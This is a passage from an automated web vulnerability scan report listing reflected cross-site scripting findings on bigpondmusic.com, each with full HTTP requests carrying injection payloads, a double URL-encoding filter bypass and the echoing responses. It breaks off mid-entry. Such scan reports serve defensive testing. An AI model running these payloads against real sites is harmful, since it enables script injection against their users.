Path:   /album/mando-diao/mtv-unplugged-above-and-beyond

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69935"style%3d"x%3aexpression(alert(1))"58a70fee747 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69935"style="x:expression(alert(1))"58a70fee747 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mando-diao/mtv-unplugged-above-and-beyond?69935"style%3d"x%3aexpression(alert(1))"58a70fee747=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:26:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 126980


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mando Diao - MTV Unplugged -
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mando-diao/mtv-unplugged-above-and-beyond?69935"style="x:expression(alert(1))"58a70fee747=1" />
...[SNIP]...

2.92. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b was submitted in the REST URL parameter 1. This input was echoed as c3413"><script>alert(1)</script>cef7e926d6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumc3413%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecef7e926d6b/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumc3413"><script>alert(1)</script>cef7e926d6b/massive-attack/atlas-air-ep" />
...[SNIP]...

2.93. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b33'%3ba641b115d06 was submitted in the REST URL parameter 1. This input was echoed as d9b33';a641b115d06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd9b33'%3ba641b115d06/massive-attack/atlas-air-ep HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:29:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd9b33';a641b115d06';
   s.prop4 = 'massive-attack';
   s.prop5 = 'atlas-air-ep';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.94. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 was submitted in the h parameter. This input was echoed as 9f0a6"style="x:expression(alert(1))"8eeaf2aab30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?h=7647081059f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?h=7647081059f0a6"style="x:expression(alert(1))"8eeaf2aab30" />
...[SNIP]...

2.95. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0802"style="x:expression(alert(1))"d70ff86ab90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107490


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?f0802"style="x:expression(alert(1))"d70ff86ab90=1" />
...[SNIP]...

2.96. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b4e'%3baede1c38fe1 was submitted in the REST URL parameter 1. This input was echoed as c4b4e';aede1c38fe1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc4b4e'%3baede1c38fe1/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc4b4e';aede1c38fe1';
   s.prop4 = 'mike-posner';
   s.prop5 = 'cooler-than-me3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.97. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac was submitted in the REST URL parameter 1. This input was echoed as fed7f"><script>alert(1)</script>883376e85ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfed7f"><script>alert(1)</script>883376e85ac/mike-posner/cooler-than-me3" />
...[SNIP]...

2.98. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 was submitted in the h parameter. This input was echoed as a8f38"style="x:expression(alert(1))"76db599ad81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?h=694323401a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105771


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?h=694323401a8f38"style="x:expression(alert(1))"76db599ad81" />
...[SNIP]...

2.99. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b9d9"style="x:expression(alert(1))"39133f9d96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?9b9d9"style="x:expression(alert(1))"39133f9d96c=1" />
...[SNIP]...

2.100. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14 was submitted in the REST URL parameter 1. This input was echoed as d31e9"><script>alert(1)</script>c1e077d3c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumd31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87913


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumd31e9"><script>alert(1)</script>c1e077d3c14/nelly/5-0-deluxe" />
...[SNIP]...

2.101. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c014'%3babb2e6a640f was submitted in the REST URL parameter 1. This input was echoed as 4c014';abb2e6a640f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4c014'%3babb2e6a640f/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4c014';abb2e6a640f';
   s.prop4 = 'nelly';
   s.prop5 = '5-0-deluxe';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...

2.102. http://bigpondmusic.com/album/nelly/5-0-deluxe [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 was submitted in the h parameter. This input was echoed as c434d"style="x:expression(alert(1))"f7c0d253232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/nelly/5-0-deluxe?h=771623980c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
